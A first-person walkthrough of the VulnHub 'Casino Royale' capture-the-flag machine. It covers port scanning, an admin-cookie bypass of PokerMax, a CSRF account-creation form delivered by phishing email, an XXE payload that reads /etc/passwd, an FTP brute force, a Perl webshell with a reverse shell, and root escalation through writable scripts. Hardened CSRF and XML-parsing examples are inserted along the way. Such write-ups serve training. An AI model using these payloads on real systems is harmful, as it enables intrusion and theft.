Casino Royale CTF Walkthrough

Another James Bond themed CTF challenge from https://www.vulnhub.com/.

Spoilers ahead!

Scanning & Enumeration

Let’s start with a port scan of the target system:

Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-02 EST
Nmap scan report for casino-royale.local (192.168.0.109)
Host is up (0.00074s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 2.0.8 or later
25/tcp   open  smtp    Postfix smtpd
|_smtp-commands: casino.local domain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
| ssl-cert: Subject: commonName=casino
| Subject Alternative Name: DNS:casino
| Not valid before:
|_Not valid after:
|_ssl-date: TLS randomness does not represent time
80/tcp   open  http    Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 2 disallowed entries
|_/cards /kboard
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
8081/tcp open  http    PHP cli server 5.5 or later
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2
Network Distance: 1 hop

Nikto highlights some interesting directories to check out:

nikto -h 192.168.0.109
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.0.109
+ Target Hostname:    192.168.0.109
+ Target Port:        80
+ Start Time:         2019-03-02 10:18:23 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.25 (Debian)
+ Server leaks inodes via ETags, header found with file /, fields: 0xdc 0x58272762faf27
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Entry '/cards/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/kboard/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Multiple index files found: /index.html, /index.php
+ Allowed HTTP Methods: HEAD, GET, POST, OPTIONS
+ /kboard/: KBoard Forum 0.3.0 and prior have a security problem in forum_post.php and forum_reply.php
+ OSVDB-3092: /cards/: This might be interesting...
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3092: /install/: This might be interesting...
+ Uncommon header 'x-robots-tag' found, with contents: noindex, nofollow
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 8348 requests: 0 error(s) and 18 item(s) reported on remote host
+ End Time:           2019-03-02 (GMT-5) (29 seconds)

The /install directory shows that PokerMax Pro Poker software (v0.13) is installed. A quick Google search turns up a public exploit (https://www.exploit-db.com/exploits/6766) that lets you log in as an administrator simply by adding a cookie.

[Screenshot: http://192.168.0.109/install/ - "PokerMax Poker League Installation": "Please ensure you have created the database and edited the config.php file with the correct database information before attempting to install. You are about to install PokerMax Pro Poker Software version v0.13. Click to Start Installation"]

I used BurpSuite to add the cookie when making the request:

GET /pokeradmin/configure.php HTTP/1.1
Host: 192.168.0.109
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: ...
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cookie: ValidUserAdmin=admin

I was then redirected to the administrator panel without authentication 🙂

[Screenshot: http://192.168.0.109/pokeradmin/configure.php - PokerMax Poker League "Configure Settings" admin page (menu: Home, League Settings, Clear League Data, Create Poker Tournament, Manage Poker Tournament, Add / Update Scores, Assign Players, Add New Players, Print Results). The form shows Username "admin", Password "raise12million", Poker League Name "Casino Royale", League description "Elite High-stakes Texas Hold'em located at the Casino", Contact Email "NA".]

Once logged in, I could see listings of existing players:

[Screenshot: PokerMax Poker League "Manage Poker Players" - seven players including Felix Leiter, James Bond and Tomelli, all with Date Added 17 November 2018, each with an "Edit Info" link]

One user profile stood out because it had an email address attached:

[Screenshot: PokerMax Poker League "Update Player Information" for player Valenka (nickname valenka). The Email Address field carries a note that her projects are hosted on a local hostname and that you need to add it to your hosts file.]

Cross Site Request Forgery Exploitation

As per the instructions in the user profile, I added a hosts file entry pointing casino-royale.local at the VulnHub system and browsed to the /vip-client-portfolios directory. This shows a SnowFox CMS:

[Screenshot: Snowfox CMS blog (About / Blog / My Account), sorted by publish time, US English]

Casino Royale Event!
We invite our loyal customers to participate in a luxurious event at the Casino Royale in Montenegro! The name of the game is Texas Hold'em and it's high stakes. Bring all and bet the farm!

High-Tech Gadgets
Very specific hard to find gadgets - that's what we have! A niche market we surpass all of our competitors in.

One post relates to contacting the CMS admin. Another Google search shows that the SnowFox CMS application is vulnerable to Cross Site Request Forgery (https://www.exploit-db.com/exploits/35301).

New Clients - Please Read
If you've been referred and are interested in our "assistance", please send us an email.
Send an email to our CMS admin: valenka@casino-royale.local
Make sure to reference a known customer or at least someone we know in the subject line, otherwise the email will be deleted without being looked at.
Valenka checks her email often as well as manages this site.
Include any links to relevant information such as references, services, referrals, etc.

Site is LIVE! Welcome!
Big thanks to the IT folks for making this! Deadlines were tight and the complaints about "secure code review" were plentiful, but with the help of upper management we've pushed through.

Time to craft the CSRF exploit:

cat exploit.html
[Screenshot: an HTML page containing a form whose action is http://casino-royale.local/vip-client-portfolios/?url=admin/accounts/create, with hidden inputs for verifiedEmail, username, newPassword, confirmPassword, userGroups[] (value 33), memo, status, formAction (value submit) and form, so that submitting it creates a new administrator account in the context of the logged-in admin]
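For contrast, here is the synchronizer-token check that an account-creation handler like the one targeted above would need in order to refuse a form submitted from another origin. This is an added example, not SnowFox CMS code; the function names and the CSRF_FIELD name are my assumptions.

```php
<?php
// Synchronizer-token CSRF defence for a state-changing admin form such as the
// account-creation endpoint targeted above. Added example, not SnowFox CMS code;
// the function names and the CSRF_FIELD name are assumptions.
const CSRF_FIELD = 'csrf_token';

// Mint the per-session token once; the legitimate form embeds it as a hidden field.
function csrf_issue(array &$session): string {
    if (empty($session[CSRF_FIELD])) {
        $session[CSRF_FIELD] = bin2hex(random_bytes(32));   // 256 bits, unguessable
    }
    return $session[CSRF_FIELD];
}

// Hidden input for the real <form>. A page on another origin cannot read this value
// (same-origin policy), so a forged POST like exploit.html arrives without it.
function csrf_hidden_input(array &$session): string {
    return '<input type="hidden" name="' . CSRF_FIELD . '" value="'
         . htmlspecialchars(csrf_issue($session), ENT_QUOTES, 'UTF-8') . '">';
}

// Gate for the POST handler: the submitted token must match the session's exactly.
function csrf_valid(array $post, array $session): bool {
    $sent     = $post[CSRF_FIELD] ?? null;
    $expected = $session[CSRF_FIELD] ?? null;
    if (!is_string($sent) || !is_string($expected) || $expected === '') {
        return false;                                         // no token issued or sent
    }
    return hash_equals($expected, $sent);                     // constant-time compare
}

// The account-creation handler checks the token before it looks at any other field.
function create_account(array $post, array $session): string {
    if (!csrf_valid($post, $session)) {
        return 'rejected: missing or invalid CSRF token';
    }
    // ... only now validate the fields and insert the account ...
    return 'created: ' . ($post['username'] ?? '');
}

// Walk-through with a constructed session: the real page renders the hidden input,
// so a genuine submission carries the token while a forged one (exploit.html's
// field names, constructed values) does not.
$session = [];
$hidden  = csrf_hidden_input($session);
$forged  = ['username' => 'newuser', 'newPassword' => 'x', 'confirmPassword' => 'x',
            'userGroups' => ['33'], 'formAction' => 'submit'];
$genuine = $forged + [CSRF_FIELD => $session[CSRF_FIELD]];
echo create_account($forged, $session), PHP_EOL;    // the forged POST is refused
echo create_account($genuine, $session), PHP_EOL;   // the genuine one is accepted
```

Pairing this with a session cookie issued as SameSite=Lax (via session_set_cookie_params) adds an independent barrier, since the browser then omits the session cookie from cross-site POSTs altogether.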

Then send an email to the target account to persuade them to click:

telnet 192.168.0.109 25
Trying 192.168.0.109...
Connected to 192.168.0.109.
Escape character is '^]'.
220 Mail Server - NO UNAUTHORIZED ACCESS ALLOWED
EHLO test
250-casino.local
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250-DSN
250 SMTPUTF8
MAIL FROM: james@bond.com
250 2.1.0 Ok
RCPT TO: valenka
250 2.1.5 Ok
data
354 End data with <CR><LF>.<CR><LF>
subject: felix
http://192.168.0.[attacker IP]/exploit.html
kthxbai
.
250 2.0.0 Ok: queued as F268625C6

With our new admin account created, I could now log in to the CMS as an admin. Whilst reviewing the user profiles, I noticed another web address in the "le" profile:

[Screenshot: Snowfox CMS admin user editor (Username, Password, Confirm password, User Groups: Administrators / All Users, Logins: 0, Last Login IP: No Data, Last Login Time, User Language: US English, Memo). The Memo for "le" reads: "I primarily deal with the numbers, along with our most Elite customers with access to /ultra-access-view/main.php"]

XML External Entity Injection

Looking at the source code of this URL suggested that it might be vulnerable to XXE:

<h1>Access:</h1>
<!-- FYI this is taking POST requests without a front end for the time being..
Try using curl to POST XML commands or script files here!
PHP code below... -->
<?php
// Explicitly re-enables loading of external entities (it is the default on PHP 7).
libxml_disable_entity_loader(false);
// The raw request body is parsed as XML straight from the client.
$xmlfile = file_get_contents('php://input');
$dom = new DOMDocument();
// LIBXML_NOENT substitutes entity references and LIBXML_DTDLOAD loads external DTDs,
// so an attacker-supplied DOCTYPE can pull local files into the document (XXE).
$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
$creds = simplexml_import_dom($dom);
$user = $creds->customer;
$pass = $creds->password;
// Whatever the entity expanded to is reflected straight back to the client.
echo "<h2>Welcome $user!</h2>";
?>
<!-- also pls update the password for the custom ftp acct once the front end is finished.. since it's easy -->
</html>
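For contrast, a hardened version of that parser, written here as an added example (not the CTF's code; the function name parse_creds is mine). It accepts the same document shape but refuses any DOCTYPE, never substitutes entities and never loads external resources, then exercises both a normal login document and the XXE payload from this walkthrough.

```php
<?php
// Hardened replacement for the main.php parser above (added example, not the CTF's code).
// It accepts the same <creds><customer/><password/></creds> document but removes what
// made the original exploitable: LIBXML_NOENT and LIBXML_DTDLOAD are gone, the external
// entity loader is disabled, and any input carrying a DOCTYPE (the only place an entity
// can be declared) is refused before libxml ever sees it.
function parse_creds(string $xml): ?array {
    if (stripos($xml, '<!DOCTYPE') !== false) {
        return null;                               // fail closed, do not try to strip it
    }
    // Belt and braces for older PHP, where libxml may fetch an external entity while
    // parsing even without NOENT: make every external load fail.
    libxml_set_external_entity_loader(function () { return null; });
    $prevErrors = libxml_use_internal_errors(true);  // collect parse errors quietly
    $dom = new DOMDocument();
    $loaded = $dom->loadXML($xml, LIBXML_NONET);      // NONET: no network during parsing
    libxml_clear_errors();
    libxml_use_internal_errors($prevErrors);
    libxml_set_external_entity_loader(null);          // restore the default loader
    if (!$loaded || $dom->doctype !== null) {
        return null;                               // malformed, undeclared entity, or DTD
    }
    $root = $dom->documentElement;
    if ($root === null || $root->tagName !== 'creds') {
        return null;
    }
    $out = [];
    foreach (['customer', 'password'] as $field) {
        $node = $root->getElementsByTagName($field)->item(0);
        if ($node === null || trim($node->textContent) === '') {
            return null;
        }
        $out[$field] = $node->textContent;
    }
    return $out;
}

// Constructed inputs: a normal login document and the XXE payload used in the walkthrough.
$benign = '<creds><customer>Vesper</customer><password>hunter2</password></creds>';
$xxe    = '<?xml version="1.0"?>'
        . '<!DOCTYPE foo [ <!ELEMENT foo ANY> <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>'
        . '<creds><customer>&xxe;</customer><password>x</password></creds>';

var_dump(parse_creds($benign));   // customer and password come back as plain strings
var_dump(parse_creds($xxe));      // null: refused before any entity could be resolved
```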

I put together an XXE exploit using BurpSuite, which revealed the “customer” parameter was vulnerable:

Request:

GET /ultra-access-view/main.php HTTP/1.1
Host: casino-royale.local
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html, ...;q=0.8
Accept-Language: ...;q=0.5
Accept-Encoding: gzip, deflate
Cookie: ...
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 2021

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY> <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<creds><customer>&xxe;</customer></creds>

Response (rendered): the "Welcome ...!" heading contains the full /etc/passwd, including lines such as

speech-dispatcher:x:...:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
pulse:x:110:114:PulseAudio daemon,,,:/var/run/pulse:/bin/false
avahi:x:...:Avahi mDNS daemon,,,:...:/bin/false
saned:x:112:118::...:/bin/false
valenka:x:...:/bin/bash
postfix:x:114:121::/var/spool/postfix:/bin/false
ftp:x:115:124:ftp daemon,,,:...

followed by the page's closing comment:

<!-- also pls update the password for the ftp acct once the front end is finished.. since it's easy -->

Brute Force Time!

Since the HTML comments on the previous page suggested the FTP user had a weak password, and we now know the username (ftpUserULTRA) from the /etc/passwd file, this looked like a good brute force candidate.

ACCOUNT CHECK: [ftp] Host: 192.168.0.109 (1 of 1, 0 complete) User: ftpUserULTRA (1 of 1, 0 complete) Password: sqlsqlsqlsql (50 of 221 complete)
ACCOUNT CHECK: [ftp] Host: 192.168.0.109 (1 of 1, 0 complete) User: ftpUserULTRA (1 of 1, 0 complete) Password: bankbank (51 of 221 complete)
ACCOUNT FOUND: [ftp] Host: 192.168.0.109 User: ftpUserULTRA Password: bankbank [SUCCESS]
ACCOUNT CHECK: [ftp] Host: 192.168.0.109 (1 of 1, 1 complete) User: ftpUserULTRA (1 of 1, 1 complete) Password: networking (52 of 221 complete)
ACCOUNT CHECK: [ftp] Host: 192.168.0.109 (1 of 1, 1 complete) User: ftpUserULTRA (1 of 1, 1 complete) Password: testing (53 of 221 complete)

Credentials: ftpUserULTRA/bankbank

I connected to the FTP server using the credentials gained through brute force. Looking in the FTP directory, there were files which were also accessible from the webserver, such as hello_world.pl:

http://casino-royale.local/ultra-access-view/hello_world.pl

[Screenshot: FTP directory listing of the ftpUserULTRA home directory (Desktop, Documents, Downloads, Music, Pictures, Public, Templates, Videos), each entry 4096 bytes, dated 2018]

This made it fairly obvious the aim was to upload a shell. Since existing Perl code was in place, that looked like the best option.

I uploaded /usr/share/webshells/perl/perlcmd.cgi, and used that to execute a reverse netcat shell:

nc -lvp 1234
listening on [any] 1234 ...
uid=33(www-data) gid=33(www-data) groups=33(www-data)

[Screenshot: browser at casino-royale.local/ultra-access-view/ showing the perlcmd.cgi output "Executing: which netcat" followed by "/bin/netcat"]

Privilege Escalation

After poking around for a bit, I could see some interesting files in the /opt/casino-royale directory.

[Screenshot: ls -la /opt/casino-royale (total 48) listing casino-data-collection.py, closer2root.txt, collect.php, index.html, mi6_detect_test, php-web-start.sh, run.sh and user-data.log, with mixed root / www-data ownership, several group-writable entries and one setuid/setgid entry (-rwsr-sr-x), all dated January/February]

The file casino-data-collection.py was owned by “le” but writable by my current user group (www-data).

I appended a reverse shell into the data collection file:

www-data@casino:/opt/casino-royale$ echo "[python reverse shell one-liner connecting back to 192.168.0.[attacker IP]:4444]" > casino-data-collection.py
www-data@casino:/opt/casino-royale$ python casino-data-collection.py

By calling the file in the webroot, I got another reverse shell as the “le” user:


As per the previous directory listing, "le" was able to write to run.sh, which in turn was invoked from ./mi6_detect_test. The file already contained shell commands, so I added /bin/sh to it. Running mi6_detect_test then provided a root shell.


Looking in the /root/flag directory, a flag script was found. Executing this started another web server …
